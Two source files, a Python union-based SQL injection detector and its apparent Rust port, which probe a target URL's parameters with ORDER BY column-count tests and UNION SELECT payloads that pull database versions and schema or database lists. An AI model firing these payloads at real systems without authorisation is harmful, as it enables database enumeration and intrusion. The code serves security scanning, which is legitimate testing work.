File: legacy/lib/techniques/union_based.py
#!/usr/bin/env python3
# -*- coding: utf-8 -*-

"""
Union-based SQL injection detection
"""

import re
from ..utils.http_utils import inject_payload_in_url
from ..utils.cli import print_status


class UnionBasedDetector:
    """Class to detect union-based SQL injections"""

    def __init__(self, url, request_handler, logger, vuln_logger=None):
        """
        Initialize union-based detector

        Args:
            url (str): Target URL
            request_handler (RequestHandler): HTTP request handler instance
            logger (logging.Logger): Logger instance
            vuln_logger (VulnerabilityLogger, optional): Vulnerability logger
        """
        self.url = url
        self.request_handler = request_handler
        self.logger = logger
        self.vuln_logger = vuln_logger

        # Regular expressions to detect UNION-based injections
        # Looking for patterns like 1,2,3,4,5 in the response
        self.injection_patterns = [
            # Numbers pattern (matches sequences like 1,2,3 or 1 2 3)
            re.compile(r'(\d+)[\s,]+(\d+)[\s,]+(\d+)', re.IGNORECASE),

            # Version strings for various databases
            re.compile(
                r'(MySQL|MariaDB)[\s\-\_]+(\d+\.\d+\.\d+)', re.IGNORECASE),
            re.compile(
                r'(SQL\s*Server|MSSQL)[\s\-\_]+(\d+\.\d+\.\d+)', re.IGNORECASE),
            re.compile(r'(PostgreSQL)[\s\-\_]+(\d+\.\d+)', re.IGNORECASE),
            re.compile(
                r'(Oracle Database)[\s\-\_]+(\d+\.\d+\.\d+)', re.IGNORECASE),
            re.compile(r'(SQLite)[\s\-\_]+(\d+\.\d+\.\d+)', re.IGNORECASE)
        ]

    def detect_injection_in_response(self, response_text):
        """
        Detect injection patterns in response text

        Args:
            response_text (str): HTTP response text

        Returns:
            tuple: (bool, str) - (is_vulnerable, matched_text)
        """
        for pattern in self.injection_patterns:
            match = pattern.search(response_text)
            if match:
                return True, match.group(0)

        return False, None

    def determine_column_count(self, parameter, max_columns=20, is_post=False, data=None):
        """
        Determine the number of columns in a table

        Args:
            parameter (str): Parameter name to test
            max_columns (int): Maximum number of columns to test
            is_post (bool): Whether to test POST parameter
            data (dict, optional): POST data

        Returns:
            int: Number of columns or 0 if not detected
        """
        self.logger.info(
            f"Determining column count for parameter '{parameter}'")

        for i in range(1, max_columns + 1):
            # Create ORDER BY payload
            order_by_payload = f"' ORDER BY {i}--"

            try:
                if is_post:
                    # Modify POST data
                    test_data = data.copy()
                    test_data[parameter] = order_by_payload

                    # Send POST request
                    response = self.request_handler.post(
                        self.url, data=test_data)
                else:
                    # Inject payload into URL parameter
                    test_url = inject_payload_in_url(
                        self.url, parameter, order_by_payload)

                    # Send GET request
                    response = self.request_handler.get(test_url)

                # Check if response indicates an error
                # If ORDER BY n+1 causes an error, then there are n columns
                if any(error in response.text.lower() for error in [
                    "unknown column", "order by", "sqlstate", "odbc driver",
                        "syntax error", "unclosed quotation", "error"]):
                    self.logger.info(f"Found column count: {i-1}")
                    return i - 1

            except Exception as e:
                self.logger.error(f"Error testing column count {i}: {str(e)}")
                continue

        self.logger.warning(
            "Could not determine column count, using default of 1")
        return 1

    def generate_union_payloads(self, column_count):
        """
        Generate UNION-based payloads for the determined column count

        Args:
            column_count (int): Number of columns

        Returns:
            list: List of UNION-based payloads
        """
        payloads = []

        # Generate different combinations of payloads
        # Basic number sequence
        payloads.append(
            f"' UNION SELECT {','.join(str(i) for i in range(1, column_count + 1))}--")

        # NULL placeholders with database version in different positions
        for i in range(1, column_count + 1):
            columns = ["NULL"] * column_count
            columns[i-1] = "@@version"  # MySQL/MSSQL version
            payloads.append(f"' UNION SELECT {','.join(columns)}--")

            columns = ["NULL"] * column_count
            columns[i-1] = "version()"  # PostgreSQL version
            payloads.append(f"' UNION SELECT {','.join(columns)}--")

            if column_count >= 2:
                columns = ["NULL"] * column_count
                columns[i-1] = "banner"
                # Oracle version
                payloads.append(
                    f"' UNION SELECT {','.join(columns)} FROM v$version--")

        # Database specific payloads
        # MySQL
        payloads.append(
            f"' UNION SELECT {','.join('schema_name' if i == 1 else 'NULL' for i in range(1, column_count + 1))} FROM information_schema.schemata--")

        # MSSQL
        payloads.append(
            f"' UNION SELECT {','.join('name' if i == 1 else 'NULL' for i in range(1, column_count + 1))} FROM master..sysdatabases--")

        # PostgreSQL
        payloads.append(
            f"' UNION SELECT {','.join('datname' if i == 1 else 'NULL' for i in range(1, column_count + 1))} FROM pg_database--")

        return payloads

    def scan_parameter(self, parameter, is_post=False, data=None):
        """
        Scan a parameter for union-based SQL injection

        Args:
            parameter (str): Parameter name to test
            is_post (bool): Whether to test POST parameter
            data (dict, optional): POST data

        Returns:
            tuple: (bool, str, str) - (is_vulnerable, database_type, payload)
        """
        self.logger.info(
            f"Testing parameter '{parameter}' for union-based SQL injection")

        # Determine column count
        column_count = self.determine_column_count(
            parameter, is_post=is_post, data=data)

        # Generate payloads based on column count
        payloads = self.generate_union_payloads(column_count)

        # Test each payload
        for payload in payloads:
            try:
                if is_post:
                    # Modify POST data
                    test_data = data.copy()
                    test_data[parameter] = payload

                    # Send POST request
                    response = self.request_handler.post(
                        self.url, data=test_data)
                else:
                    # Inject payload into URL parameter
                    test_url = inject_payload_in_url(
                        self.url, parameter, payload)

                    # Send GET request
                    response = self.request_handler.get(test_url)

                # Check if response indicates successful injection
                is_vulnerable, matched_text = self.detect_injection_in_response(
                    response.text)

                if is_vulnerable:
                    # Determine database type from the payload and response
                    db_type = "Unknown"

                    if "@@version" in payload and ("MySQL" in response.text or "MariaDB" in response.text):
                        db_type = "MySQL"
                    elif "@@version" in payload and "SQL Server" in response.text:
                        db_type = "MSSQL"
                    elif "version()" in payload and "PostgreSQL" in response.text:
                        db_type = "PostgreSQL"
                    elif "v$version" in payload and "Oracle" in response.text:
                        db_type = "Oracle"
                    elif "sqlite_version()" in payload and "SQLite" in response.text:
                        db_type = "SQLite"
                    elif "information_schema" in payload:
                        db_type = "MySQL"
                    elif "sysdatabases" in payload:
                        db_type = "MSSQL"
                    elif "pg_database" in payload:
                        db_type = "PostgreSQL"

                    # Log vulnerability
                    print_status(
                        f"Parameter '{parameter}' is vulnerable to union-based SQL injection", "vuln")
                    print_status(f"Database type: {db_type}", "info")
                    print_status(f"Payload: {payload}", "info")
                    print_status(f"Matched text: {matched_text}", "info")

                    self.logger.warning(
                        f"Found union-based SQL injection in parameter '{parameter}' with payload: {payload}")

                    if self.vuln_logger:
                        self.vuln_logger.add_vulnerability(
                            url=self.url,
                            injection_type="Union-based",
                            parameter=parameter,
                            payload=payload,
                            database_type=db_type,
                            details={"column_count": column_count,
                                     "matched_text": matched_text}
                        )

                    return True, db_type, payload

            except Exception as e:
                self.logger.error(f"Error testing payload {payload}: {str(e)}")
                continue

        print_status(
            f"Parameter '{parameter}' is not vulnerable to union-based SQL injection", "info")
        self.logger.info(
            f"No union-based SQL injection found in parameter '{parameter}'")

        return False, None, None

File: src/techniques/union_based.rs
//! Union-based SQL injection detection - port of legacy/lib/techniques/union_based.py

use once_cell::sync::Lazy;
use regex::Regex;

use crate::http_client::inject_payload_in_url;
use super::{ScanContext, TechniqueResult};

const MAX_COLUMNS: usize = 20;

/// Error keywords that indicate ORDER BY n+1 failed (so column count = n).
static ERROR_KEYWORDS: Lazy<Vec<&'static str>> = Lazy::new(|| {
    vec![
        "unknown column",
        "order by",
        "sqlstate",
        "odbc driver",
        "syntax error",
        "unclosed quotation",
        "error",
    ]
});

/// Patterns to detect successful UNION injection in response (number sequence or version strings).
static INJECTION_PATTERNS: Lazy<Vec<Regex>> = Lazy::new(|| {
    vec![
        Regex::new(r"(\d+)[\s,]+(\d+)[\s,]+(\d+)").unwrap(),
        Regex::new(r"(?i)(MySQL|MariaDB)[\s\-_]+(\d+\.\d+\.\d+)").unwrap(),
        Regex::new(r"(?i)(SQL\s*Server|MSSQL)[\s\-_]+(\d+\.\d+\.\d+)").unwrap(),
        Regex::new(r"(?i)(PostgreSQL)[\s\-_]+(\d+\.\d+)").unwrap(),
        Regex::new(r"(?i)(Oracle Database)[\s\-_]+(\d+\.\d+\.\d+)").unwrap(),
        Regex::new(r"(?i)(SQLite)[\s\-_]+(\d+\.\d+\.\d+)").unwrap(),
    ]
});

fn response_indicates_error(text: &str) -> bool {
    let lower = text.to_lowercase();
    ERROR_KEYWORDS.iter().any(|kw| lower.contains(kw))
}

fn detect_injection_in_response(text: &str) -> bool {
    INJECTION_PATTERNS.iter().any(|re| re.is_match(text))
}

fn determine_column_count(ctx: &ScanContext, parameter: &str) -> usize {
    let data = ctx.data.map(|m| m.clone()).unwrap_or_default();

    for i in 1..=MAX_COLUMNS {
        let order_by_payload = format!("' ORDER BY {}--", i);
        let res = if ctx.is_post {
            let mut form = data.clone();
            form.insert(parameter.to_string(), order_by_payload.clone());
            ctx.handler.post(ctx.url, &form)
        } else {
            let url = inject_payload_in_url(ctx.url, parameter, &order_by_payload);
            ctx.handler.get(&url)
        };

        let response = match res {
            Ok(r) => r,
            Err(_) => continue,
        };
        let text = response.text().unwrap_or_default();
        if response_indicates_error(&text) {
            return i.saturating_sub(1).max(1);
        }
    }
    1
}

fn generate_union_payloads(column_count: usize) -> Vec<String> {
    let mut payloads = Vec::new();
    let cols: Vec<String> = (1..=column_count).map(|i| i.to_string()).collect();
    payloads.push(format!("' UNION SELECT {}--", cols.join(",")));

    for i in 1..=column_count {
        let mut cols = vec!["NULL".to_string(); column_count];
        cols[i - 1] = "@@version".to_string();
        payloads.push(format!("' UNION SELECT {}--", cols.join(",")));

        cols[i - 1] = "version()".to_string();
        payloads.push(format!("' UNION SELECT {}--", cols.join(",")));

        if column_count >= 2 {
            cols[i - 1] = "banner".to_string();
            payloads.push(format!("' UNION SELECT {} FROM v$version--", cols.join(",")));
        }
    }

    let mut cols: Vec<String> = (1..=column_count)
        .map(|i| if i == 1 { "schema_name".to_string() } else { "NULL".to_string() })
        .collect();
    payloads.push(format!("' UNION SELECT {} FROM information_schema.schemata--", cols.join(",")));

    cols[0] = "name".to_string();
    payloads.push(format!("' UNION SELECT {} FROM master..sysdatabases--", cols.join(",")));

    cols[0] = "datname".to_string();
    payloads.push(format!("' UNION SELECT {} FROM pg_database--", cols.join(",")));

    payloads
}

fn db_type_from_payload_and_response(payload: &str, response_text: &str) -> String {
    if payload.contains("@@version") {
        if response_text.contains("MySQL") || response_text.contains("MariaDB") {
            return "MySQL".to_string();
        }
        if response_text.contains("SQL Server") {
            return "MSSQL".to_string();
        }
    }
    if payload.contains("version()") && response_text.contains("PostgreSQL") {
        return "PostgreSQL".to_string();
    }
    if payload.contains("v$version") && response_text.contains("Oracle") {
        return "Oracle".to_string();
    }
    if payload.contains("sqlite_version()") && response_text.contains("SQLite") {
        return "SQLite".to_string();
    }
    if payload.contains("information_schema") {
        return "MySQL".to_string();
    }
    if payload.contains("sysdatabases") {
        return "MSSQL".to_string();
    }
    if payload.contains("pg_database") {
        return "PostgreSQL".to_string();
    }
    "Unknown".to_string()
}

/// Scan one parameter: find column count, generate UNION payloads, test until match.
pub fn scan_parameter(ctx: &ScanContext, parameter: &str) -> TechniqueResult {
    let column_count = determine_column_count(ctx, parameter);
    let payloads = generate_union_payloads(column_count);
    let data = ctx.data.map(|m| m.clone()).unwrap_or_default();

    for payload in payloads {
        let res = if ctx.is_post {
            let mut form = data.clone();
            form.insert(parameter.to_string(), payload.clone());
            ctx.handler.post(ctx.url, &form)
        } else {
            let url = inject_payload_in_url(ctx.url, parameter, &payload);
            ctx.handler.get(&url)
        };

        let response = match res {
            Ok(r) => r,
            Err(_) => continue,
        };
        let text = response.text().unwrap_or_default();

        if detect_injection_in_response(&text) {
            let db = db_type_from_payload_and_response(&payload, &text);
            return TechniqueResult::vulnerable(db, payload);
        }
    }

    TechniqueResult::not_vulnerable()
}

#[cfg(test)]
mod tests {
    use super::*;

    #[test]
    fn test_response_indicates_error() {
        assert!(response_indicates_error("Unknown column 'x' in 'order by'"));
        assert!(response_indicates_error("syntax error near something"));
        assert!(!response_indicates_error("Hello world"));
    }

    #[test]
    fn test_detect_injection_in_response() {
        assert!(detect_injection_in_response("1,2,3,4,5"));
        assert!(detect_injection_in_response("MySQL 5.7.0"));
        assert!(!detect_injection_in_response("no numbers here"));
    }

    #[test]
    fn test_generate_union_payloads() {
        let p = generate_union_payloads(2);
        assert!(!p.is_empty());
        assert!(p[0].contains("UNION SELECT"));
        assert!(p[0].contains("1,2"));
    }
}
